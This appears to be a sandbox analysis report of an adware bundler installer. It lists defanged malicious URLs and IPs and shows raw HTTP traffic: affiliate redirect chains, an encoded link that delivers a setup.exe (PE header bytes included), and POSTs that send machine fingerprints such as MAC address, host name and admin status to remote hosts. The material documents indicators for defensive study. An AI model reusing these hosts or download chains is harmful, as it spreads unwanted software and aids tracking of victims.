hxxp://ee.ilentialnessme.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=117&aff_sub2=151377&aff_sub3=&aff_sub4=&aff_sub5=1399165537&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2	54.88.21.193
hxxp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=2291&source=2180&aff_sub=0&aff_sub2=0&aff_sub3=&aff_sub4=&aff_sub5=0&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=2180&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2	54.246.201.113
hxxp://ee.ilentialnessme.bid/offer.php?affId=2291&trackingId=135176390&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2	54.88.21.193
hxxp://ee.ilentialnessme.bid/installer.php?affId=2291&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&trackingId=135176390&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2	54.88.21.193
hxxp://d2adi7hu49xk5t.cloudfront.net/appImg.jpg	52.222.174.190
hxxp://d2adi7hu49xk5t.cloudfront.net/normal_bg.jpg	52.222.174.190
hxxp://ee.ilentialnessme.bid/report.php?typ=sys&affId=1006&instId=11&ho_transId=1022cfb36461ebc8195bc69760cdf1&transId=135176390&chk_s_b=VMware-56 4d 22 96 65 fe b6 85-36 78 73 8e 10 74 4e 8c&chk_s_v=HPQOEM - 6040000&chk_c_ma=VMware, Inc.&chk_c_mo=VMware Virtual Platform&chk_mac=00:50:56:33:B5:51&randid=0.44531263149565414	54.88.21.193
hxxp://ee.ilentialnessme.bid/report.php?typ=conversion&transId=135176390&affId=1006&instId=11&ho_transId=1022cfb36461ebc8195bc69760cdf1&s1=117&s2=151377&s3=&s4=&s5=1399165537&cid=5c12d1104cca24294ae7d8d45ce8d028&uac=true&randid=0.3799597195784592	54.88.21.193
hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker_uk2.php?url=hxxp://gurusetman.info/taveara?q=setup&name=Installation
hxxp://gurusetman.info/taveara?q=setup	104.18.40.31
hxxp://greates.info/?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=setup&type=setup&size=3145728&sub_id=346&sub_id2=Kt86-ZfR0bKuZsB7kP3NNhupjIn3i4ti9tLLSX3ap6d1wZXY2bMx_MzcZD4ka-au6b9eF9GlKWFnnbgrmIpGWgtbX_Ngr0gZZWB5Fq21jfakgCiJWr	104.27.151.43
hxxp://oblo.raidedsentry.ru/0nIydlSpN0ZrFmZqFjMxZUNCdlWadGMydmTfhlY0d2VHBXStJ3Zi5mbGd1SsdUOGVWOiZTdh1SYrRDRaNmeN9FeNJmMZhlW3FDZ2AXYzg1UMxEd5kGd0k2MulkawVHaO50MQt2NCNnW1tkYwIlZa1iN4Q3SiojIyQWafJWdzJCLiYDNzIiOiQWafJWdzJCLigjM3UDNxMjI6ISZ6l2ciwiIwVHdlNnI6ISZwlHdiwiIwVHdlNnI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/index.php
hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html	52.222.174.240
hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/css/style.css	52.222.174.240
hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon1-green.png	52.222.174.240
hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon2-green.png	52.222.174.240
hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon3-green.png	52.222.174.240
hxxp://n135adserv.com/js/show_ads_supp.js?pubId=907
hxxp://ic-dc.deliverydlcenter.com/favicon.ico	52.222.174.240
hxxp://ee.ilentialnessme.bidhxxp://ee.ilentialnessme.bid/installer.php?affId=2291&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&trackingId=135176390&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2	54.88.21.193
hxxp://www.1-1ads.com/js/show_ads_supp.js?pubId=907	212.124.124.178
hxxp://ee.ilentialnessme.bidhxxp://ee.ilentialnessme.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=117&aff_sub2=151377&aff_sub3=&aff_sub4=&aff_sub5=1399165537&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2	54.88.21.193
hxxp://away.yosauruslega.bid/get.php?ses=429155916441231936
hxxp://www.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png	107.20.147.93
hxxp://ee.ilentialnessme.bidhxxp://ee.ilentialnessme.bid/offer.php?affId=2291&trackingId=135176390&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2	54.88.21.193
hxxp://wet.sodcattilyrem.bid/stub_maker_uk2.php?url=hxxp://gurusetman.info/taveara?q=setup&name=Installation	52.222.174.135
hxxp://www.selfdislikedfarfet.site/index.php	107.20.147.93
hxxp://win.ketydesmidiana.bidhxxp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=2291&source=2180&aff_sub=0&aff_sub2=0&aff_sub3=&aff_sub4=&aff_sub5=0&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=2180&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2	54.246.201.113

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/css/style.css HTTP/1.1

Accept: text/css

Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ic-dc.deliverydlcenter.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: text/css

Content-Length: 1967

Connection: keep-alive

Date: Mon, 10 Oct 2016 08:52:43 GMT

Last-Modified: Fri, 07 Oct 2016 08:02:49 GMT

ETag: "92657668b4257695bd2699a787aee60b"

Accept-Ranges: bytes

Server: AmazonS3

Age: 64444

X-Cache: Hit from cloudfront

Via: 1.1 e7ce333c56f455a0dae7f1f5ea5d6086.cloudfront.net (CloudFront)

X-Amz-Cf-Id: fhHJWlc0aTPvIif0TAxqMwP162bjl_kkLruNbHh_EQJHE-Lfs25efg==

body{...margin: 0;...padding: 0;...font-family: Helvetica, Arial, sans-serif;..}..h1{...margin: 0;...font-size: 28px;...font-weight: normal;...text-align: center;...color: #333;..}...container{...margin: 0 auto;...width: 980px;...padding-left: 20px;...padding-right: 20px;..}...header h1.typ{...line-height: 80px;...padding-top: 0;..}...header h1{...padding-top: 13px;..}...header h1 span{...display: block;...font-size: 14px;..}...header-top, .header-bottom{...position: relative;...height: 80px;...width: 100%;..}...header-top.green{...background: #22B573;..}...header-top.blue{...background: #0461C9;..}...header-bottom.grey{...background: #CCCCCC;..}...header-bottom.light-blue{...background: #B6D2F2;...border-bottom:1px solid #02294C;..}..#widget{...margin: 0 auto;...margin-top: 50px;...margin-bottom: 150px;..}...footer{...position: relative;...width: 100%;...height: 216px;...background: #e5e5e5;...border-top: 1px solid #fff;...-webkit-box-sizing: border-box;...-moz-box-sizing: border-box;...box-sizing: border-box;..}...footer:before{...position: absolute;...left: 0;...right: 0;...top: -2px;...height: 1px;...width: 100%;...content: '';.....}...footer.green:before{...background: #0F4C2E;..}...footer.blue:before{...background: #02294C;..}...footer h3{...margin-top: 38px;...margin-bottom: 28px;...font-size: 18px;...text-align: center;...text-shadow: -1px 1px 0 #fff;..}...footer h3.green{...color: #22B573;..}...footer h3.blue{...color: #0461C9;..}..ul.steps{...margin: 0;...padding: 0;...list-style-type: none;..}..ul.st

<<< skipped >>>

GET /?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=setup&type=setup&size=3145728&sub_id=346&sub_id2=Kt86-ZfR0bKuZsB7kP3NNhupjIn3i4ti9tLLSX3ap6d1wZXY2bMx_MzcZD4ka-au6b9eF9GlKWFnnbgrmIpGWgtbX_Ngr0gZZWB5Fq21jfakgCiJWr HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0

Host: greates.info

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 302 Moved Temporarily

Date: Sun, 13 Nov 2016 05:19:19 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d173566d0828d0aa2e2d9476f9244ccef1479014359; expires=Mon, 13-Nov-17 05:19:19 GMT; path=/; domain=.greates.info; HttpOnly

X-Powered-By: PHP/5.4.16

Location: hXXp://oblo.raidedsentry.ru/0nIydlSpN0ZrFmZqFjMxZUNCdlWadGMydmTfhlY0d2VHBXStJ3Zi5mbGd1SsdUOGVWOiZTdh1SYrRDRaNmeN9FeNJmMZhlW3FDZ2AXYzg1UMxEd5kGd0k2MulkawVHaO50MQt2NCNnW1tkYwIlZa1iN4Q3SiojIyQWafJWdzJCLiYDNzIiOiQWafJWdzJCLigjM3UDNxMjI6ISZ6l2ciwiIwVHdlNnI6ISZwlHdiwiIwVHdlNnI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye

Server: cloudflare-nginx

CF-RAY: 300fc4a1f37f2902-OTP

0..HTTP/1.1 302 Moved Temporarily..Date: Sun, 13 Nov 2016 05:19:19 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Set-Cookie: __cfduid=d173566d0828d0aa2e2d9476f9244ccef1479014359; expires=Mon, 13-Nov-17 05:19:19 GMT; path=/; domain=.greates.info; HttpOnly..X-Powered-By: PHP/5.4.16..Location: hXXp://oblo.raidedsentry.ru/0nIydlSpN0ZrFmZqFjMxZUNCdlWadGMydmTfhlY0d2VHBXStJ3Zi5mbGd1SsdUOGVWOiZTdh1SYrRDRaNmeN9FeNJmMZhlW3FDZ2AXYzg1UMxEd5kGd0k2MulkawVHaO50MQt2NCNnW1tkYwIlZa1iN4Q3SiojIyQWafJWdzJCLiYDNzIiOiQWafJWdzJCLigjM3UDNxMjI6ISZ6l2ciwiIwVHdlNnI6ISZwlHdiwiIwVHdlNnI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye..Server: cloudflare-nginx..CF-RAY: 300fc4a1f37f2902-OTP..0..

<<< skipped >>>

POST /index.php HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: VVV.selfdislikedfarfet.site

Content-Length: 523

Connection: Keep-Alive

Cache-Control: no-cache

Net1.1=&Net2=3.5.30729.5420SP1&Net4=4.5.50709&OSversion=NT6.1SP1&Slv=&Sysid=541B298A93BFE2600111218F9ABFCC32&Sysid1=52D311BE788EE1E500992B8A6A042C2B&X64=N&admin=Y&browser=IE.HTTP&cavp=&chver=54.0.2840.59&cmdl=Setup__2140_il2.exe&dprod=D068E036AD104FFF0E13053E615F8D&dprod4=C275E3FEDEC17C9D31A2BE03568B64&exe=Setup__2140_il2&ffver=49.0.1.6109&lang_DfltUser=0409&mac=MDA1MDU2MzNCNTUxMDAwMAA=&machg=ODhkY2QzOTUtYjA2Mi00NWIzLWE2Y2QtNzlmMzdjMGViYTA4AA==&name=V0lOLVVLMEZGT084M0k2AA==&netfs=3&ts=1479014369&ver=1.1.5.26

HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Sun, 13 Nov 2016 05:19:30 GMT

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

transfer-encoding: chunked

Connection: keep-alive

37c1....<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> . <title>DownloadManagerModern</title>...<script type="text/javascript">... var g_notCompatibleWithUpdaterComps = ['LootFindKP'];... var g_postponedComps = ['updater', 'Paltalk', 'SHAREit', 'JinshanDuba', 'UCwebAccelerator', 'UltimateSecurityPackage' , 'TotalSecurity', 'TotalSecurityIN', 'TotalSecurityRU'];...</script> . <base href="hXXp://VVV.selfdislikedfarfet.site:80/index.php" />.<link rel="stylesheet" type="text/css" href="hXXp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css" /> <script type="text/javascript" src="hXXp://cdn1.leadingdownload.com/V38/amipb.js"></script>. <script type="text/javascript">.var g_r_appimageurl="http:\/\/pe-sixi.com\/img\/icon_installer.png";..var g_r_appname="installer";..var g_r_cmdline="\/S";.. var g_amiobj = '', g_ami, g_updb = false, g_close = '1', g_additional_offer_list = '1';. var g_finish_install_button = '1';. var g_popup_install_all = '1';. var g_eula = 'VGhlIGRvd25sb2FkIGFuZCBpbnN0YWxsYXRpb24gcHJvY2VzcyBvZiB0aGlzIGZpbGUgaXMgcnVuIGJ5IEluc3RhbGxQYXRoIEluc3RhbGwgTWFuYWdlci4KQnkgY2xpY2tpbmcgdGhlICJBY2NlcHQiIG9yICJOZXh0IiBidXR0b25zIGJlbG93LCBvciBieSBjb250aW51aW5nIHRoaXMgSW5zdGFsbFBhdGggSW5zdGFsbCBNYW5hZ2VyIGluc3RhbGxhdGlvbiwgb3Igb3R

<<< skipped >>>

GET /0nIydlSpN0ZrFmZqFjMxZUNCdlWadGMydmTfhlY0d2VHBXStJ3Zi5mbGd1SsdUOGVWOiZTdh1SYrRDRaNmeN9FeNJmMZhlW3FDZ2AXYzg1UMxEd5kGd0k2MulkawVHaO50MQt2NCNnW1tkYwIlZa1iN4Q3SiojIyQWafJWdzJCLiYDNzIiOiQWafJWdzJCLigjM3UDNxMjI6ISZ6l2ciwiIwVHdlNnI6ISZwlHdiwiIwVHdlNnI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0

Host: oblo.raidedsentry.ru

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.4.2

Date: Sun, 13 Nov 2016 05:19:19 GMT

Content-Type: application/exe; charset=windows-1251

Content-Length: 4758720

Connection: keep-alive

X-Powered-By: PHP/5.4.17

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Last-Modified: Sun, 13 Nov 2016 05:19:19 GMT

Cache-Control: no-store, no-cache, must-revalidate

Cache-Control: post-check=0, pre-check=0

Content-Disposition: attachment; filename="setup.exe"

Content-Transfer-Encoding: binary

Pragma: public

MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..................$..f$.......$......0$...@...........................I.......H..........@............................1..7...P4..v...........|H.. ...@2..............................02.....................................................CODE....T.$.......$................. ..`DATA.........0$.......$.............@...BSS...........0.......0..................idata...7....1..8....0.............@....tls....0.... 2.......0..................rdata.......02.......0.............@..P.reloc.......@2.......0.............@..P.rsrc....v...P4..x....3.............@..P..............>......0=.............@..P..................................................................................................................................................................@...Boolean...........@..False.True.@.,.@...WideChar..........D.@...Char..........X.@...Smallint..........p.@...Integer.............@...Byte............@...Word............@...Cardinal............@...Int64...................@...Double..@...@...Real....@...Currency....@...ShortString...$.@...WordBool......... .@..False.True..L.@...LongBool.........H.@..False.True..t.@...String..@...WideString..@...Variant.@...@...OleVariant..@...............................@.........0E@.<E@.@E@.DE@.8E@.lB@..B@..B@..T

<<< skipped >>>

GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon1-green.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ic-dc.deliverydlcenter.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/png

Content-Length: 3392

Connection: keep-alive

Date: Mon, 10 Oct 2016 08:52:43 GMT

Last-Modified: Fri, 07 Oct 2016 08:02:49 GMT

ETag: "122fe75beae30ff3ea83688e03402879"

Accept-Ranges: bytes

Server: AmazonS3

Age: 64443

X-Cache: Hit from cloudfront

Via: 1.1 d76fac2b5a2f460a1cbffb76189f59ef.cloudfront.net (CloudFront)

X-Amz-Cf-Id: zgILzJjnODf9_u3eKN_YRJY1_4NUoxU3WshC48sfjHLWtnBwAHE_Mg==

.PNG........IHDR...>...E......$UF....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..[{l[W.?..g..fvR.]..2.4.z.N..?jOC......C....IS[....%Y............i].@..c.@.?Hs%.:&.....&..c.............#YIS...;.w.....cB.O......GE.l.3.n7.2Rv..FQ..JF. ...Lt.....?..m.cN...'yK...k..Y..l..........j...qO:.?.......n...8K........K7<9X.db.$.....b.............=-........<uhB..2......-/VI.Hzy.$."..?y...<.....-.iF..x.. ...N..ke....)......!._.mJc..p,a.Z.Gd.x.(...p.......j....~3.. .I..a....~4...S...NN0f.W..2.I.....t....i`..1d.6....E...^.oKGb$qm.}..;.f...g...h%x..t.K ..'.......(X...W.:...]#.p......>.._;.>j..{..V.(k.W...O\....oj..^.....K.lq>.<.......eJ........?..Yp.`.Ic........F............OV.../...n.....u.3...F..`... .....oj..b.......7"..;]i.B.. ...K.A{..W.^.g....9..?}..p....R.M....i..N.D....;......QK..,".....9.....ub>...P.....g:9/...:?.y?..a8...L....L.b.s............W...O|.S...w*...3=..J.,...:...3ok..mz....W....E.S.F.N...99K.v.S.P.......].!ey:]#C..!.8 .W...D;dq.......>;...|Y.,3D.Gq.Mg.D..i.|..X.......[.@.s8.8sVD.*cYmj.=.3..2........W...vw...fy9^.....z......pEQ. ...Q....T....#.[/..t.0z.h!..>t.....%".Bl.{.<.{.JW.....?.3h.{w...(...DF..p...dV.}X....PJ...n.A.....o. p.(..........H..3....H...N....F)p8....$.......Y....z:Tn.....W.q....6..D..G.Ud.f.....C.X....D......N..{..T.j......../."..=...g..)..<(hwX.rf...0...Z=J..=....1B..n.$U\.P.re.ku.u&8.nC.........W........so..../.O5...G.....OB#%...x...~..`.;.....^.m."...........q..S]..T.....Fj)>...|.jZ...['.....:.s.x..O.m.....[....\$0..{..&.r...^.U...?.o..Y.......ZW].

<<< skipped >>>

GET /normal_bg.jpg HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: d2adi7hu49xk5t.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/jpeg

Content-Length: 26781

Connection: keep-alive

Date: Thu, 22 Sep 2016 18:01:12 GMT

Last-Modified: Mon, 13 Jun 2016 11:29:07 GMT

ETag: "b5b0ebe137c0293f816eaac3de2b4e51"

Accept-Ranges: bytes

Server: AmazonS3

Age: 39984

X-Cache: Hit from cloudfront

Via: 1.1 8d84df16ba20ff1d2ca3914948494e04.cloudfront.net (CloudFront)

X-Amz-Cf-Id: uBkHd_5RoRqHN9as-QnlhLcpdLg65yUcQ1ooISYFQfMUoHgFEyDRww==

......Exif..II*.................Ducky.......<.....3hXXp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.146729, 2012/05/03-13:40:03 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop Elements 12.0 Windows" xmpMM:InstanceID="xmp.iid:889F23E5F49B11E4A1FBA1E3C36AE7EE" xmpMM:DocumentID="xmp.did:889F23E6F49B11E4A1FBA1E3C36AE7EE"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:889F23E3F49B11E4A1FBA1E3C36AE7EE" stRef:documentID="xmp.did:889F23E4F49B11E4A1FBA1E3C36AE7EE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...................................................................................................................................................E....................................................................................!.1AQa...q.....2R..u.7...."...U..B.....5.b..%4Tte'r.E..#$D......................!1."AQ2.a..BR.q...b.#3.....r......S......C.............?....j9...n..OK....xr...8..q.C..o..k.k..L[3...v....z.zqNi(...T..#.mJ..TU.....SYi.U.-[NJ9..e.IU.;.k.KY...Rm..{.....K...M..D.b...E.;.k.K[..#&.kG.....F..........k~p., ....J. .0...K-7.(..m..2q...1.}.V.1l...U........E.....*..5..fi.Oe.{...

<<< skipped >>>

GET /appImg.jpg HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: d2adi7hu49xk5t.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/jpeg

Content-Length: 4628

Connection: keep-alive

Date: Thu, 22 Sep 2016 18:01:12 GMT

Last-Modified: Mon, 13 Jun 2016 11:29:06 GMT

ETag: "ba6c4124ad5d33528fe1d609e6ac1ff0"

Accept-Ranges: bytes

Server: AmazonS3

Age: 39984

X-Cache: Hit from cloudfront

Via: 1.1 bd3e2233bf25337a89461c638cad13b9.cloudfront.net (CloudFront)

X-Amz-Cf-Id: U-EUqNxZUN-BrxOxbK_UDEar3VnABPkQfmkMdNlTHZNm6Mm0Ye_qvA==

......Exif..II*.................Ducky.......<.....3hXXp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.146729, 2012/05/03-13:40:03 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop Elements 12.0 Windows" xmpMM:InstanceID="xmp.iid:E39F75D6F49A11E4B7DAEACD8AA72C6E" xmpMM:DocumentID="xmp.did:E39F75D7F49A11E4B7DAEACD8AA72C6E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E39F75D4F49A11E4B7DAEACD8AA72C6E" stRef:documentID="xmp.did:E39F75D5F49A11E4B7DAEACD8AA72C6E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.................................................................................................................................................K.G........................................................................................!..1AQa.."R.T.q24D.%...B#dEU'.bSc.5u&C$t.67(.....................!1AQa..."2BR.q...b....rS.......#............?.<fnfHr.B..v.......ddD.P.Q5.(.(t.....%.KH....,...@L..f.|?..4G.....[......b.......).4_....=.<.....o.....}....6..3D....w........u.{..e.(...yN..f..sr......}...G.o......G\...-TBL.<fex.=.;...u.;..vO6..}.:p...^"x...G.s...k.=....../.t....xg.4O..^..e..z

<<< skipped >>>

GET hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=2291&source=2180&aff_sub=0&aff_sub2=0&aff_sub3=&aff_sub4=&aff_sub5=0&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=2180&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1

Host: win.ketydesmidiana.bid

Connection: close

Accept: */*

User-Agent: InstallCapital

HTTP/1.1 302 Found

Cache-Control: no-cache, no-store, must-revalidate

Content-Type: text/html; charset=iso-8859-1

Date: Sun, 13 Nov 2016 05:19:07 GMT

Expires: Sat, 26 Jul 1997 05:00:00 GMT

Location: hXXp://ee.ilentialnessme.bid/offer.php?affId=2291&trackingId=135176390&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2

P3P: CP="NOI CUR OUR NOR INT"

Pragma: no-cache

Server: nginx/1.7.9

Set-Cookie: enc_aff_session_4=ENC02854-1022cfb36461ebc8195bc69760cdf1-2291-4-0-0-0-0-UA-0-32313830-30-30-_-_-30-194.242.96.226-20161113001907-_-7A6E6C272A16063B3C1716017461103D5562581C522C06645C4244007D0960733C7E091640616B0D16; expires=Tue, 13 Dec 2016 05:19:07 GMT; path=/;

Set-Cookie: ho_mob=eyJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiSW5zdGFsbENhcGl0YWwiLCJjb25uZWN0aW9uX3NwZWVkIjoiYnJvYWRiYW5kIn0=; expires=Tue, 08 Oct 2019 15:59:07 GMT; path=/;

tracking_id: 1022cfb36461ebc8195bc69760cdf1

X-Robots-Tag: noindex, nofollow

Content-Length: 453

Connection: Close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>302 Found</title>.</head><body>.<h1>Found</h1>.<p>The document has moved <a href="hXXp://ee.ilentialnessme.bid/offer.php?affId=2291&trackingId=135176390&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2">here</a>.</p>.</body></html>...

<<< skipped >>>

GET /report.php?typ=conversion&transId=135176390&affId=1006&instId=11&ho_transId=1022cfb36461ebc8195bc69760cdf1&s1=117&s2=151377&s3=&s4=&s5=1399165537&cid=5c12d1104cca24294ae7d8d45ce8d028&uac=true&randid=0.3799597195784592 HTTP/1.1

Cache-Control: no-cache

Connection: Keep-Alive

Pragma: no-cache

User-Agent: InstallCapital

Host: ee.ilentialnessme.bid

HTTP/1.1 200 OK

